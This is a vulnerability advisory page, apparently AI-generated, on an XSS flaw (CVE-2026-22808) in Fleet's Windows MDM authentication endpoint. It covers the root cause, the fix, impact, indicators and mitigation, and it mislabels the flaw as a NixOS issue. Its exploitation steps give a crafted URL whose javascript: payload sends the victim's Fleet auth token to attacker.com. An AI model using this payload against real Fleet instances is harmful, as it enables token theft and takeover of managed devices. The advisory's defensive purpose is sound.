CVE-2026-22808: 
NixOS vulnerability analysis and mitigation

Overview

CVE-2026-22808 is a Cross-Site Scripting (XSS) vulnerability in Fleet's Windows MDM authentication endpoint (mdmMicrosoftAuthEndpoint) that allows an attacker to steal authenticated users' Fleet session tokens. It affects FleetDM Fleet versions prior to 4.53.3, 4.75.2, 4.76.2, 4.77.1, and 4.78.2 (Go module github.com/fleetdm/fleet). The vulnerability was disclosed on January 20, 2026, and patched the same day. It carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 5.5 (Medium) (Github Advisory, Fleet Advisory).

Technical details

The root cause is improper neutralization of user-controlled input in the Windows MDM Security Token Service (STS) authentication flow (CWE-79). Specifically, the appru URL parameter passed to the mdmMicrosoftAuthEndpoint was not validated for scheme or content before being reflected into an HTML response rendered by the server, previously using text/template instead of the safer html/template. An attacker crafts a malicious link containing a JavaScript payload (e.g., javascript:alert(1), data:text/html,..., or raw JS injection) in the appru query parameter targeting the MDE2AuthPath endpoint; when an authenticated Fleet user visits this link, the payload executes in their browser context. The fix added an isValidAppru() function that allowlists only http, https, and ms-app URL schemes, and switched template rendering to html/template for proper escaping (Fleet Advisory, Patch Commit).

Impact

Successful exploitation allows an attacker to steal the Fleet authentication token from the victim's browser, which may grant administrative access to the Fleet API. With administrative API access, an attacker could deploy scripts to all managed hosts, modify device configurations, or exfiltrate sensitive device management data across the entire managed fleet. The vulnerability only affects instances where Windows MDM is enabled and requires the victim to be an authenticated Fleet user, limiting but not eliminating the risk of broad organizational compromise (Fleet Advisory).

Exploitability

No public proof-of-concept exploit code or in-the-wild exploitation has been reported for this vulnerability. The EPSS score is approximately 0.047–0.128%, indicating a low near-term exploitation probability. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires social engineering an authenticated Fleet user into clicking a crafted link, and Windows MDM must be enabled on the target instance (Github Advisory, Fleet Advisory).

Exploitation steps

  1. Reconnaissance: Identify a Fleet instance with Windows MDM enabled. Confirm the target version is vulnerable (< 4.53.3, < 4.75.2, < 4.76.2, < 4.77.1, or < 4.78.2).
  2. Craft malicious URL: Construct a URL targeting the Fleet Windows MDM auth endpoint with a malicious appru parameter, e.g.:
    https://<fleet-instance>/api/mdm/microsoft/auth?appru=javascript:fetch('https://attacker.com/?token='+localStorage.getItem('FLEET::auth_token'))&login_hint=victim@example.com
  3. Deliver the link: Send the crafted URL to an authenticated Fleet user via phishing email, chat message, or other social engineering vector.
  4. Token exfiltration: When the victim clicks the link while authenticated, the injected JavaScript executes in their browser, extracting the Fleet authentication token and sending it to the attacker-controlled server.
  5. API abuse: Use the stolen token to authenticate to the Fleet API and perform privileged actions such as deploying scripts to managed Windows hosts or modifying MDM configurations (Fleet Advisory, Patch Commit).

Indicators of compromise

  • Network: Outbound HTTP requests from a Fleet user's browser to an unexpected external domain shortly after accessing the Fleet MDM auth endpoint; unusual Fleet API calls (e.g., script deployment) originating from a token used at an unexpected time or IP address.
  • Logs: Fleet web server access logs showing GET requests to the Windows MDM auth path (e.g., /api/mdm/microsoft/auth or the MDE2AuthPath equivalent) with suspicious appru parameter values containing javascript:, data:, or encoded script payloads.
  • Fleet API Audit Logs: Privileged API actions (script deployments, policy changes) performed by a user account at unusual hours or from an unfamiliar IP, potentially indicating token theft and misuse.

Mitigation and workarounds

Fleet has released patched versions addressing this vulnerability: 4.78.2, 4.77.1, 4.76.2, 4.75.2, and 4.53.3. Organizations should upgrade to one of these versions immediately. As an interim workaround if an immediate upgrade is not possible, disable Windows MDM in Fleet, as the vulnerability does not affect instances where Windows MDM is disabled. For questions, contact Fleet security at security@fleetdm.com or via the #fleet channel in the osquery Slack (Fleet Advisory, Github Advisory).

Community reactions

The vulnerability was responsibly disclosed by researcher @secfox-ai (GitHub: prateek-0490) and remediated by Fleet developer iansltx. Fleet published the advisory and patch on the same day (January 20, 2026), demonstrating a rapid response. No significant broader media coverage or notable community controversy has been identified beyond standard vulnerability database aggregation (Fleet Advisory).

Additional resources


Source: This report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-103678HIGH8.1
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103680MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103679MEDIUM6.5
  • NixOS logoNixOS
  • tnef
NoNoOct 01, 2026
CVE-2026-103497MEDIUM5.5
  • YouTrack logoYouTrack
  • cpe:2.3:a:jetbrains:youtrack
NoYesOct 01, 2026
CVE-2026-103496MEDIUM5.4
  • YouTrack logoYouTrack
  • youtrack
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management